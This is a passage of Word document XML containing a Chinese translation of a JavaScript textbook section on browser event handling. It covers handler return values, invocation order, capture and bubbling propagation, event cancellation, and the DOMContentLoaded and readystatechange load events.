        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>阻止浏览器提交表单。（当用户的输入在客户端验证失败时，这是有用的。）类似地，如果用户输入不合适</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>的字符，输入域上的</w:t>
      </w:r>
      <w:r>
        <w:t>onkeypress</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序能通过返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>来过滤键盘输入。（例</w:t>
      </w:r>
      <w:r>
        <w:t>17-6</w:t>
      </w:r>
      <w:r>
        <w:t>就是用这种方式过滤键盘输入。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>onbeforeunload</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序的返回值也非常有意义。当浏览器将要跳转到新页面时触发这个事件。如果事件处理程序返回一个字符串，那么它</w:t>
      </w:r>
      <w:r>
        <w:t>将出现在询问用户是否想离开当前页面的标准对话框中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>理解事件处理程序的返回值只对通过属性注册的处理程序才有意义这非常重要。接下来我们将看到使用</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>attachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>注册事件处理程序转而必须调用</w:t>
      </w:r>
      <w:r>
        <w:t>preventDefault()</w:t>
      </w:r>
      <w:r>
        <w:t>方法或设置事件对象的</w:t>
      </w:r>
      <w:r>
        <w:t>returnValue</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="439" w:name="17_3_5_Diao_Yong_Shun_Xu_"/>
      <w:r>
        <w:t>17.3.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　调用顺序</w:t>
      </w:r>
      <w:bookmarkEnd w:id="439"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>文档元素或其他对象可以为指定事件类型注册多个事件处理程序。当适当的事件发生时，浏览器必须按照如下规则调用所有的事件处理程序：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>通过设置对象属性或</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性注册的处理程序</w:t>
      </w:r>
      <w:r>
        <w:t>一直优先调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>注册的处理程序按照它们的注册顺序调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>attachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>注册的处理程序可能按照任何顺序调用，所以代码不应该依赖于调用顺序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="440" w:name="17_3_6_Shi_Jian_Chuan_Bo_"/>
      <w:r>
        <w:t>17.3.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　事件传播</w:t>
      </w:r>
      <w:bookmarkEnd w:id="440"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当事件目标是</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象或其他一些单独对象（比如</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>）时，浏览器简单地通过调用对象上适当的处理程序响应事件。当事件目标是文档或文档元素时，情况比较复杂。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在调用在目标元素上注册的事件处理函数后，大部分事件会</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>冒泡</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>树根。调用目标的父元素的事件处理程</w:t>
      </w:r>
      <w:r>
        <w:t>序，然后调用在目标的祖父元素上注册的事件处理程序。这会一直到</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象，最后到达</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象。事件冒泡为在大量单独文档元素上注册处理程序提供了替代方案，即在共同的祖先元素上注册一个处理程序来处理所有的事件。例如，可以在＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素上注册</w:t>
      </w:r>
      <w:r>
        <w:t>"change"</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序来取代在表单的每个元素上注册</w:t>
      </w:r>
      <w:r>
        <w:t>"change"</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>发生在文档元素上的大部分事件都会冒泡，值得注意的例外是</w:t>
      </w:r>
      <w:r>
        <w:t>focus</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>blur</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>scroll</w:t>
      </w:r>
      <w:r>
        <w:t>事件。文档元素上的</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件会冒泡，但它会在</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象上停止冒泡而不会</w:t>
      </w:r>
      <w:r>
        <w:t>传播到</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象。只有当整个文档都加载完毕时才会触发</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>事件冒泡是事件传播的第三个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>阶段</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。目标对象本身的事件处理程序调用是第二个阶段。第一个阶段甚至发生在目标处理程序调用之前，称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>捕获</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>阶段。回顾之前</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>把一个布尔值作为其第三个参数。如果这个参数是</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，那么事件处理程序被注册为捕获事件处理程序，它会在事件传播的第一个阶段调用。事件冒泡得到广泛的支持，它能用在包括</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>在内的所有浏览器中，且无论事件处理程序用哪种方式注册（除非它们被注册</w:t>
      </w:r>
      <w:r>
        <w:t>为捕获事件处理程序）。而事件捕获只能用于以</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>注册且第三个参数是</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>的事件处理程序中。这意味着事件捕获无法在</w:t>
      </w:r>
      <w:r>
        <w:t>IE9</w:t>
      </w:r>
      <w:r>
        <w:t>之前的</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中使用，所以在写本章时，它还不是通用的技术。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>事件传播的捕获阶段像反向的冒泡阶段。最先调用</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的捕获处理程序，然后是</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的捕获处理程序，接着是</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>对象的，再然后是</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>树向下，以此类推，直到调用事件目标的父元素的捕获事件处理程序。在目标对象本身上注册的捕获事件处理程序不会被调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>事件捕获提供了在事件没有送达目标之前查看它们的机会。事件捕获能用于程序调试，或用于后面介绍的事件取消技术，过滤掉事件从而使目标事件处理程序绝不会被调用。事件捕获常用于处理</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>鼠标拖放，因为要处理拖放事件的位置不能是这个元素内部的子元素。请看例</w:t>
      </w:r>
      <w:r>
        <w:t>17-2</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="441" w:name="17_3_7_Shi_Jian_Qu_Xiao_"/>
      <w:r>
        <w:t>17.3.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　事件取消</w:t>
      </w:r>
      <w:bookmarkEnd w:id="441"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>17.3.4</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍了用属性注册的事件处理程序的返回值能用于取消事件的浏览器默认操作。在支持</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器中，也能通过调用事件对象的</w:t>
      </w:r>
      <w:r>
        <w:t>preventDefault()</w:t>
      </w:r>
      <w:r>
        <w:t>方法取消事件的默认操作。不过，在</w:t>
      </w:r>
      <w:r>
        <w:t>IE 9</w:t>
      </w:r>
      <w:r>
        <w:t>之前的</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中，可以通过设置事件对象的</w:t>
      </w:r>
      <w:r>
        <w:t>returnValue</w:t>
      </w:r>
      <w:r>
        <w:t>属性为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>来达到同样的效果。下面的代码假设一个事件处理程序，它使用全部三种取消技术：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function cancelHandler(event){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var event=event||window.event;//</w:t>
      </w:r>
      <w:r>
        <w:t>用于</w:t>
      </w:r>
      <w:r>
        <w:t>IE/*</w:t>
      </w:r>
      <w:r>
        <w:t>这里是处理事件的代码</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>现在取消事件相关的默认行为</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(event.preventDefault)event.preventDefault();//</w:t>
      </w:r>
      <w:r>
        <w:t>标准技术</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(event.returnValue)event.retu</w:t>
      </w:r>
      <w:r>
        <w:t>rnValue=false;//IE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return false;//</w:t>
      </w:r>
      <w:r>
        <w:t>用于处理使用对象属性注册的处理程序</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当前的</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>事件模型草案定义了</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象属性</w:t>
      </w:r>
      <w:r>
        <w:t>defaultPrevented</w:t>
      </w:r>
      <w:r>
        <w:t>。它尚未得到广泛支持，但其目的是常态下这个属性是</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，但如果</w:t>
      </w:r>
      <w:r>
        <w:t>preventDefaut()</w:t>
      </w:r>
      <w:r>
        <w:t>被调用则它将变成</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>取消事件相关的默认操作只是事件取消中的一种，我们也能取消事件传播。在支持</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器中，可以调用事件对象的一个</w:t>
      </w:r>
      <w:r>
        <w:t>stopPropagation()</w:t>
      </w:r>
      <w:r>
        <w:t>方法以阻止事件的</w:t>
      </w:r>
      <w:r>
        <w:t>继续传播。如果在同一对象上定义了其他处理程序，剩下的处理程序将依旧被调用，但调用</w:t>
      </w:r>
      <w:r>
        <w:t>stopPropagation()</w:t>
      </w:r>
      <w:r>
        <w:t>之后任何其他对象上的事件处理程序将不会被调用。</w:t>
      </w:r>
      <w:r>
        <w:t>stopPropagation()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以在事件传播期间的任何时间调用，它能工作在捕获期阶段、事件目标本身中和冒泡阶段。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>IE9</w:t>
      </w:r>
      <w:r>
        <w:t>之前的</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>不支持</w:t>
      </w:r>
      <w:r>
        <w:t>stopPropagation()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。相反，</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件对象有一个</w:t>
      </w:r>
      <w:r>
        <w:t>cancelBubble</w:t>
      </w:r>
      <w:r>
        <w:t>属性，设置这个属性为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>能阻止事件进一步传播。（</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及之前版本不支持事件传播的捕获阶段，所以冒泡是唯一待取消的事件</w:t>
      </w:r>
      <w:r>
        <w:t>传播。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前的</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>事件规范草案在</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象上定义另一个方法，命名为</w:t>
      </w:r>
      <w:r>
        <w:t>stopImmediatePropagation()</w:t>
      </w:r>
      <w:r>
        <w:t>。类似</w:t>
      </w:r>
      <w:r>
        <w:t>stopPropagation()</w:t>
      </w:r>
      <w:r>
        <w:t>，这个方法阻止了任何其他对象的事件传播，但也阻止了在相同对象上注册的任何其他事件处理程序的调用。在写本章时，某些浏览器支持</w:t>
      </w:r>
      <w:r>
        <w:t>stopImmediatePropagation()</w:t>
      </w:r>
      <w:r>
        <w:t>，但另外的都不支持。一些像</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>YUI</w:t>
      </w:r>
      <w:r>
        <w:t>之类的工具库定义了跨平台的</w:t>
      </w:r>
      <w:r>
        <w:t>stopImmediatePropagation()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="442" w:name="17_4_Wen_Dang_Jia_Zai_Shi_Jian_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>17.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　文档加载事件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="442"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>现在已经介绍了</w:t>
      </w:r>
      <w:r>
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:t>avaScript</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理的基本原理，我们将开始深入探索具体事件类别，本节将从文档</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件开始。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>大部分</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用都需要</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器通知它们文档加载完毕和为操作准备就绪的时间。</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件就是为了这个目的，第</w:t>
      </w:r>
      <w:r>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:t>章详细地讨论过它，同时那章的示例</w:t>
      </w:r>
      <w:r>
        <w:t>13-5</w:t>
      </w:r>
      <w:r>
        <w:t>使用了</w:t>
      </w:r>
      <w:r>
        <w:t>onLoad()</w:t>
      </w:r>
      <w:r>
        <w:t>工具函数。</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件直到文档和所有图片加载完毕时才发生。然而，在文档完全解析之后但在所有图片全部加载完毕之前开始运行脚本通常是安全的，所以如果基于</w:t>
      </w:r>
      <w:r>
        <w:t>"load"</w:t>
      </w:r>
      <w:r>
        <w:t>发生之前的事件触发脚本会提升</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用的启动时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当文</w:t>
      </w:r>
      <w:r>
        <w:t>档加载解析完毕且所有延迟（</w:t>
      </w:r>
      <w:r>
        <w:t>deferred</w:t>
      </w:r>
      <w:r>
        <w:t>）脚本都执行完毕时会触发</w:t>
      </w:r>
      <w:r>
        <w:t>DOMContentLoaded</w:t>
      </w:r>
      <w:r>
        <w:t>事件，此时图片和异步（</w:t>
      </w:r>
      <w:r>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:t>）脚本可能依旧在加载，但是文档已经为操作准备就绪了。（</w:t>
      </w:r>
      <w:r>
        <w:t>13.3.1</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍过延迟脚本和异步脚本。）</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>引入了这个事件，然后它被包括</w:t>
      </w:r>
      <w:r>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>IE9</w:t>
      </w:r>
      <w:r>
        <w:t>在内的所有其他浏览器厂商采用。尽管其名字中有</w:t>
      </w:r>
      <w:r>
        <w:t>"DOM"</w:t>
      </w:r>
      <w:r>
        <w:t>，并属于</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>事件标准的一部分，但</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>标准化了它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>正如</w:t>
      </w:r>
      <w:r>
        <w:t>13.3.4</w:t>
      </w:r>
      <w:r>
        <w:t>节所述，</w:t>
      </w:r>
      <w:r>
        <w:t>document.readyState</w:t>
      </w:r>
      <w:r>
        <w:t>属性随着文档加载过程而变。在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中，每次状态改变都伴随着</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象上的</w:t>
      </w:r>
      <w:r>
        <w:t>read</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ystatechange</w:t>
      </w:r>
      <w:r>
        <w:t>事件，当</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>接收到</w:t>
      </w:r>
      <w:r>
        <w:t>"complete"</w:t>
      </w:r>
      <w:r>
        <w:t>状态时使用这个事件来做判断是可行的。</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>标准化了</w:t>
      </w:r>
      <w:r>
        <w:t>readystatechange</w:t>
      </w:r>
      <w:r>
        <w:t>事件，但它仅在</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件之前立即触发，所以目前尚不清楚监听</w:t>
      </w:r>
      <w:r>
        <w:t>"readystatechange"</w:t>
      </w:r>
      <w:r>
        <w:t>取代</w:t>
      </w:r>
      <w:r>
        <w:t>"load"</w:t>
      </w:r>
      <w:r>
        <w:t>会带来多大好处。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>17-1</w:t>
      </w:r>
      <w:r>
        <w:t>定义了</w:t>
      </w:r>
      <w:r>
        <w:t>whenReady()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，它非常像示例</w:t>
      </w:r>
      <w:r>
        <w:t>13-5</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>onLoad()</w:t>
      </w:r>
      <w:r>
        <w:t>函</w:t>
      </w:r>
      <w:r>
        <w:t>数。当文档为操作准备就绪时，传递给</w:t>
      </w:r>
      <w:r>
        <w:t>whenReady()</w:t>
      </w:r>
      <w:r>
        <w:t>的函数将会作为</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的方法调用。和之前的</w:t>
      </w:r>
      <w:r>
        <w:t>onLoad()</w:t>
      </w:r>
      <w:r>
        <w:t>函数不同，</w:t>
      </w:r>
      <w:r>
        <w:t>whenReady()</w:t>
      </w:r>
      <w:r>
        <w:t>监听</w:t>
      </w:r>
      <w:r>
        <w:t>DOMContentLoaded</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>readystatechange</w:t>
      </w:r>
      <w:r>
        <w:t>事件，而使用</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件仅仅是为了兼容那些不支持之前事件的较老浏览器。接下来本节及后面章节的一些例子都使用</w:t>
      </w:r>
      <w:r>
        <w:t>whenReady()</w:t>
      </w:r>
